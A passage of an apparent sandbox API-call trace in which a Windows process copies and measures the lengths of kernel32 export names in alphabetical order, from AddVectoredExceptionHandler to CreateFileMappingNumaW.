lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0030.786] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0030.786] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0030.786] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0030.786] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0030.786] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0030.786] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0030.786] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0030.786] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0030.786] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0030.786] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0030.786] lstrlenA (lpString="BACKUPREAD") returned 10 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0030.786] lstrlenA (lpString="BACKUPSEEK") returned 10 [0030.786] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0030.787] lstrlenA (lpString="BACKUPWRITE") returned 11 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0030.787] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0030.787] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0030.787] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0030.787] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0030.787] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0030.787] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0030.787] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0030.787] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0030.787] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0030.787] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0030.787] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0030.787] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0030.787] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0030.787] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0030.787] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0030.787] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0030.787] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0030.788] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0030.788] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0030.788] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0030.788] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0030.788] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0030.788] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0030.788] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0030.788] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0030.788] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0030.788] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0030.788] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0030.788] lstrlenA (lpString="BEEP") returned 4 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0030.788] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0030.788] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0030.788] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0030.788] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0030.788] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0030.789] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0030.789] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0030.789] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0030.789] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0030.789] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0030.789] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0030.789] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0030.789] lstrlenA (lpString="CANCELIO") returned 8 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0030.789] lstrlenA (lpString="CANCELIOEX") returned 10 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0030.789] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0030.789] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0030.789] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0030.789] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0030.789] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0030.789] lstrlenA (lpString="CHECKELEVATION") returned 14 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0030.789] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0030.789] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0030.789] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0030.790] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0030.790] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0030.790] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0030.790] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0030.790] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0030.790] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0030.790] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0030.790] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0030.790] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0030.790] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0030.790] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0030.790] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0030.790] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0030.790] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0030.790] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0030.790] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0030.790] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0030.790] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0030.791] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0030.791] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0030.791] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0030.792] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0030.792] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0030.792] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0030.792] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0030.792] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0030.792] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0030.792] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0030.792] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0030.792] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0030.792] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0030.792] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0030.792] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0030.792] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0030.792] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0030.792] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0030.792] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0030.792] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0030.793] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0030.793] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0030.793] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0030.793] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0030.793] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0030.793] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0030.793] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0030.793] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0030.793] lstrlenA (lpString="COPYCONTEXT") returned 11 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0030.793] lstrlenA (lpString="COPYFILEA") returned 9 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0030.793] lstrlenA (lpString="COPYFILEEXA") returned 11 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0030.793] lstrlenA (lpString="COPYFILEEXW") returned 11 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0030.793] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0030.793] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0030.793] lstrlenA (lpString="COPYFILEW") returned 9 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0030.793] lstrlenA (lpString="COPYLZFILE") returned 10 [0030.793] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0030.794] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0030.794] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0030.794] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0030.794] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0030.794] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0030.794] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0030.794] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0030.794] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0030.794] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0030.794] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0030.794] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0030.794] lstrlenA (lpString="CREATEEVENTA") returned 12 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0030.794] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0030.794] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0030.794] lstrlenA (lpString="CREATEEVENTW") returned 12 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0030.794] lstrlenA (lpString="CREATEFIBER") returned 11 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0030.794] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0030.794] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0030.795] lstrlenA (lpString="CREATEFILEA") returned 11 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0030.795] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0030.795] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") 